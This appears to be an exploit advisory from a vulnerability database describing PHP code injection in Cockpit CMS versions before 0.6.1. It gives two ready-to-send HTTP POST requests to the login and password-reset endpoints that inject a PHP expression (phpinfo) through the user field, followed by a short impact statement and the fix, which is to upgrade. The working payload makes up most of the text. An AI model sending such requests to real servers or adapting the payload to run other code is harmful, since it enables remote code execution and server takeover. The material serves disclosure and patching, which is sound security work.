Cockpit CMS Remote Code Execution

2021.01.09
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Cockpit CMS 0.6.1 - Remote Code Execution # Product: Cockpit CMS (https://getcockpit.com) # Version: Cockpit CMS < 0.6.1 # Vulnerability Type: PHP Code Execution # Exploit Author: Rafael Resende # Attack Type: Remote # Vulnerability Description # Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. # Exploit Login POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} # Exploit Password reset POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"} ## Impact Allows attackers to execute malicious codes to get access to the server. ## Fix Update to versions >= 0.6.1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top